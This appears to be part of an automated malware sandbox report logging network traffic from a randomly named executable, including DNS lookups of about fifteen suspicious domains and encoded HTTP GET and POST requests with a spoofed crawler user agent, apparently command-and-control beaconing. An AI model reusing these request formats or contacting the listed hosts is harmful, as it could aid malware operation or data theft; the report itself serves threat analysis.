                                                          Jul 13, 2024 00:05:47.284784079 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:47.284849882 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:47.286871910 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:47.293803930 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250333071 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250382900 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250459909 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250464916 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:48.250498056 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250535965 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250567913 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:48.250570059 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250606060 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250638962 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250674009 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250705957 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:48.250711918 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.250746965 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:48.251383066 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:48.257841110 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.257875919 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.257910967 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.257949114 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:48.302165031 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:48.342693090 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.342765093 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.342803001 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.342839956 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.342982054 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:48.349230051 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.349267960 CEST80497735.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:48.349410057 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:48.800821066 CEST4977380192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:49.818525076 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:49.825373888 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:49.826253891 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:49.830147028 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:49.837090969 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813339949 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813388109 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813424110 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813440084 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.813457966 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813544989 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813553095 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.813580036 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813613892 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813647032 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813674927 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.813680887 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813718081 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.813756943 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.813756943 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.820806980 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.820841074 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.820874929 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.820882082 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.863257885 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.891833067 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.905704975 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.905742884 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.905750036 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.905780077 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.905816078 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.906092882 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.906126976 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.906172037 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:50.907993078 CEST80497745.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:50.908090115 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:51.332195997 CEST4977480192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:52.351037979 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:52.369877100 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:52.375850916 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:52.375850916 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:52.385540009 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:52.385570049 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.324980021 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325074911 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325110912 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325124025 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.325144053 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325180054 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325186014 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.325212955 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325300932 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325306892 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.325334072 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325366974 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325377941 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.325402975 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.325443983 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.332982063 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.333126068 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.333169937 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.333518028 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.333998919 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.334086895 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.403384924 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.413047075 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.413103104 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.413105011 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.413139105 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.413198948 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.413336039 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.413371086 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.413404942 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.413407087 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.413791895 CEST80497755.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:53.413834095 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:53.880513906 CEST4977580192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:54.898659945 CEST4977680192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:54.905571938 CEST80497765.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:54.905663967 CEST4977680192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:54.908226013 CEST4977680192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:54.915414095 CEST80497765.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:55.732801914 CEST80497765.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:55.732817888 CEST80497765.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:05:55.736397982 CEST4977680192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:55.741532087 CEST4977680192.168.2.65.78.41.174
                                                          Jul 13, 2024 00:05:55.748545885 CEST80497765.78.41.174192.168.2.6
                                                          Jul 13, 2024 00:06:01.354166031 CEST4977780192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:01.359042883 CEST804977764.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:01.360569000 CEST4977780192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:01.362500906 CEST4977780192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:01.367597103 CEST804977764.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:01.812640905 CEST804977764.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:01.812669992 CEST804977764.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:01.812742949 CEST4977780192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:03.425949097 CEST4977780192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:04.443852901 CEST4977880192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:04.450422049 CEST804977864.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:04.450506926 CEST4977880192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:04.452641964 CEST4977880192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:04.458736897 CEST804977864.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:04.908385992 CEST804977864.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:04.908508062 CEST804977864.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:04.908571959 CEST4977880192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:05.957083941 CEST4977880192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:06.975081921 CEST4977980192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:06.981921911 CEST804977964.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:06.982150078 CEST4977980192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:06.983510017 CEST4977980192.168.2.664.46.102.70
                                                          Jul 13, 2024 00:06:06.990243912 CEST804977964.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:06.991782904 CEST804977964.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:07.433316946 CEST804977964.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:07.433346987 CEST804977964.46.102.70192.168.2.6
                                                          Jul 13, 2024 00:06:07.434206963 CEST4977980192.168.2.664.46.102.70

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 13, 2024 00:02:48.702471972 CEST5757853192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:02:48.716965914 CEST53575781.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:04.241286993 CEST5062953192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:05.238507032 CEST5062953192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:05.778172016 CEST53506291.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:05.778317928 CEST53506291.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:19.209872961 CEST5455653192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:19.283248901 CEST53545561.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:32.711782932 CEST6341453192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:32.917728901 CEST53634141.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:46.164258003 CEST5728153192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:46.177983046 CEST53572811.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:03:59.273391008 CEST6522453192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:03:59.287723064 CEST53652241.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:04:12.366466045 CEST5305153192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:04:12.436220884 CEST53530511.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:04:25.694673061 CEST5054853192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:04:25.712505102 CEST53505481.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:04:38.835958004 CEST6161553192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:04:38.856600046 CEST53616151.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:04:51.960598946 CEST4919953192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:04:52.304666042 CEST53491991.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:05:05.788537025 CEST6096753192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:05:06.007956982 CEST53609671.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:05:19.868275881 CEST5062653192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:05:20.554398060 CEST53506261.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:05:33.728169918 CEST6321353192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:05:33.764424086 CEST53632131.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:05:47.256772041 CEST6008853192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:05:47.275691986 CEST53600881.1.1.1192.168.2.6
                                                          Jul 13, 2024 00:06:00.757019043 CEST5136653192.168.2.61.1.1.1
                                                          Jul 13, 2024 00:06:01.351702929 CEST53513661.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jul 13, 2024 00:02:48.702471972 CEST192.168.2.61.1.1.10x523bStandard query (0)www.yexz60.liveA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:04.241286993 CEST192.168.2.61.1.1.10x6c77Standard query (0)www.sodnavisystem.comA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:05.238507032 CEST192.168.2.61.1.1.10x6c77Standard query (0)www.sodnavisystem.comA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:19.209872961 CEST192.168.2.61.1.1.10x94d7Standard query (0)www.gymroom.onlineA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:32.711782932 CEST192.168.2.61.1.1.10x61e4Standard query (0)www.hectmalt.xyzA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:46.164258003 CEST192.168.2.61.1.1.10x3dddStandard query (0)www.atlpicsstudios.comA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:59.273391008 CEST192.168.2.61.1.1.10x4e37Standard query (0)www.bearclaw.botA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:12.366466045 CEST192.168.2.61.1.1.10xedeaStandard query (0)www.noghteyab.comA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:25.694673061 CEST192.168.2.61.1.1.10x2d41Standard query (0)www.mcpcrecycling.comA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:38.835958004 CEST192.168.2.61.1.1.10xc6a5Standard query (0)www.evoolihubs.shopA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:51.960598946 CEST192.168.2.61.1.1.10x986eStandard query (0)www.shaf-kupe-msk.storeA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:05.788537025 CEST192.168.2.61.1.1.10xbfc6Standard query (0)www.quixaclienti.comA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:19.868275881 CEST192.168.2.61.1.1.10x5402Standard query (0)www.789bet1okvip.solutionsA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:33.728169918 CEST192.168.2.61.1.1.10xcaefStandard query (0)www.334es.comA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:47.256772041 CEST192.168.2.61.1.1.10x2564Standard query (0)www.411divorce.comA (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:06:00.757019043 CEST192.168.2.61.1.1.10x2895Standard query (0)www.sgbet777.orgA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jul 13, 2024 00:02:48.716965914 CEST1.1.1.1192.168.2.60x523bNo error (0)www.yexz60.liveyexz60.liveCNAME (Canonical name)IN (0x0001)false
                                                          Jul 13, 2024 00:02:48.716965914 CEST1.1.1.1192.168.2.60x523bNo error (0)yexz60.live3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:02:48.716965914 CEST1.1.1.1192.168.2.60x523bNo error (0)yexz60.live15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:05.778172016 CEST1.1.1.1192.168.2.60x6c77No error (0)www.sodnavisystem.com162.43.105.95A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:05.778317928 CEST1.1.1.1192.168.2.60x6c77No error (0)www.sodnavisystem.com162.43.105.95A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:19.283248901 CEST1.1.1.1192.168.2.60x94d7No error (0)www.gymroom.online37.9.175.173A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:32.917728901 CEST1.1.1.1192.168.2.60x61e4No error (0)www.hectmalt.xyz203.161.41.207A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:46.177983046 CEST1.1.1.1192.168.2.60x3dddNo error (0)www.atlpicsstudios.comatlpicsstudios.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 13, 2024 00:03:46.177983046 CEST1.1.1.1192.168.2.60x3dddNo error (0)atlpicsstudios.com3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:46.177983046 CEST1.1.1.1192.168.2.60x3dddNo error (0)atlpicsstudios.com15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:59.287723064 CEST1.1.1.1192.168.2.60x4e37No error (0)www.bearclaw.botbearclaw.botCNAME (Canonical name)IN (0x0001)false
                                                          Jul 13, 2024 00:03:59.287723064 CEST1.1.1.1192.168.2.60x4e37No error (0)bearclaw.bot3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:03:59.287723064 CEST1.1.1.1192.168.2.60x4e37No error (0)bearclaw.bot15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:12.436220884 CEST1.1.1.1192.168.2.60xedeaNo error (0)www.noghteyab.com51.89.93.192A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:25.712505102 CEST1.1.1.1192.168.2.60x2d41No error (0)www.mcpcrecycling.commcpcrecycling.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 13, 2024 00:04:25.712505102 CEST1.1.1.1192.168.2.60x2d41No error (0)mcpcrecycling.com3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:25.712505102 CEST1.1.1.1192.168.2.60x2d41No error (0)mcpcrecycling.com15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:38.856600046 CEST1.1.1.1192.168.2.60xc6a5No error (0)www.evoolihubs.shop188.114.96.3A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:38.856600046 CEST1.1.1.1192.168.2.60xc6a5No error (0)www.evoolihubs.shop188.114.97.3A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:04:52.304666042 CEST1.1.1.1192.168.2.60x986eNo error (0)www.shaf-kupe-msk.store45.130.41.38A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:06.007956982 CEST1.1.1.1192.168.2.60xbfc6No error (0)www.quixaclienti.comquixaclienti.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 13, 2024 00:05:06.007956982 CEST1.1.1.1192.168.2.60xbfc6No error (0)quixaclienti.com3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:06.007956982 CEST1.1.1.1192.168.2.60xbfc6No error (0)quixaclienti.com15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:20.554398060 CEST1.1.1.1192.168.2.60x5402No error (0)www.789bet1okvip.solutions789bet1okvip.solutionsCNAME (Canonical name)IN (0x0001)false
                                                          Jul 13, 2024 00:05:20.554398060 CEST1.1.1.1192.168.2.60x5402No error (0)789bet1okvip.solutions3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:20.554398060 CEST1.1.1.1192.168.2.60x5402No error (0)789bet1okvip.solutions15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:33.764424086 CEST1.1.1.1192.168.2.60xcaefNo error (0)www.334es.com103.176.91.154A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:05:47.275691986 CEST1.1.1.1192.168.2.60x2564No error (0)www.411divorce.com411divorce.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 13, 2024 00:05:47.275691986 CEST1.1.1.1192.168.2.60x2564No error (0)411divorce.com5.78.41.174A (IP address)IN (0x0001)false
                                                          Jul 13, 2024 00:06:01.351702929 CEST1.1.1.1192.168.2.60x2895No error (0)www.sgbet777.orgsgbet777.orgCNAME (Canonical name)IN (0x0001)false
                                                          Jul 13, 2024 00:06:01.351702929 CEST1.1.1.1192.168.2.60x2895No error (0)sgbet777.org64.46.102.70A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.yexz60.live
                                                          • www.sodnavisystem.com
                                                          • www.gymroom.online
                                                          • www.hectmalt.xyz
                                                          • www.atlpicsstudios.com
                                                          • www.bearclaw.bot
                                                          • www.noghteyab.com
                                                          • www.mcpcrecycling.com
                                                          • www.evoolihubs.shop
                                                          • www.shaf-kupe-msk.store
                                                          • www.quixaclienti.com
                                                          • www.789bet1okvip.solutions
                                                          • www.334es.com
                                                          • www.411divorce.com
                                                          • www.sgbet777.org

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.6497183.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:02:48.729630947 CEST465OUTGET /b58q/?D0Pts04=9y3r5r666D9AuSqeHTwPloJpY6P8Smz3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iajC50awG1CYTeWFE8FX2P+KAxyDMNwoJDu19IBdamGeoAx/bn7Y=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.yexz60.live
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:02:49.193123102 CEST418INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:02:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 39 79 33 72 35 72 36 36 36 44 39 41 75 53 71 65 48 54 77 50 6c 6f 4a 70 59 36 50 38 53 6d 7a 33 45 6b 56 63 55 48 76 78 51 32 59 74 4e 6d 59 45 76 63 4d 41 78 73 64 44 35 64 53 55 4d 49 68 36 76 52 5a 62 59 4b 69 4c 72 46 58 47 69 43 70 33 50 65 32 69 61 6a 43 35 30 61 77 47 31 43 59 54 65 57 46 45 38 46 58 32 50 2b 4b 41 78 79 44 4d 4e 77 6f 4a 44 75 31 39 49 42 64 61 6d 47 65 6f 41 78 2f 62 6e 37 59 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=9y3r5r666D9AuSqeHTwPloJpY6P8Smz3EkVcUHvxQ2YtNmYEvcMAxsdD5dSUMIh6vRZbYKiLrFXGiCp3Pe2iajC50awG1CYTeWFE8FX2P+KAxyDMNwoJDu19IBdamGeoAx/bn7Y=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.649720162.43.105.95805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:03:05.787103891 CEST734OUTPOST /5mht/ HTTP/1.1
                                                          Host: www.sodnavisystem.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.sodnavisystem.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.sodnavisystem.com/5mht/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 55 32 55 72 39 58 4b 7a 55 36 43 57 46 78 42 41 57 65 54 66 64 66 44 79 2b 78 48 77 49 48 4f 45 36 36 62 65 36 2b 51 63 76 73 53 55 75 55 68 6f 32 56 46 64 5a 62 76 7a 43 66 4e 2f 53 4e 47 61 5a 46 31 4e 53 49 45 64 51 4d 42 41 35 34 4d 48 70 30 63 38 56 68 70 48 49 62 78 48 70 47 43 34 36 57 66 78 37 57 34 2b 62 33 52 79 44 33 74 39 68 46 75 44 4c 64 67 53 54 57 43 71 51 56 41 48 2f 64 6c 4c 6b 79 6b 49 4b 6b 34 61 58 31 65 74 37 79 50 49 6d 70 42 50 4d 41 67 73 77 6d 44 6e 72 7a 2b 44 71 4e 71 6f 43 30 6a 30 77 50 6d 7a 2b 2f 2b 4d 44 4b 69 31 75 54 61 33 58 44 35 6f 2b 66 4f 47 68 43 6e 78 64 61 4e 2f
                                                          Data Ascii: D0Pts04=U2Ur9XKzU6CWFxBAWeTfdfDy+xHwIHOE66be6+QcvsSUuUho2VFdZbvzCfN/SNGaZF1NSIEdQMBA54MHp0c8VhpHIbxHpGC46Wfx7W4+b3RyD3t9hFuDLdgSTWCqQVAH/dlLkykIKk4aX1et7yPImpBPMAgswmDnrz+DqNqoC0j0wPmz+/+MDKi1uTa3XD5o+fOGhCnxdaN/
                                                          Jul 13, 2024 00:03:06.594902992 CEST1236INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 12 Jul 2024 22:03:06 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
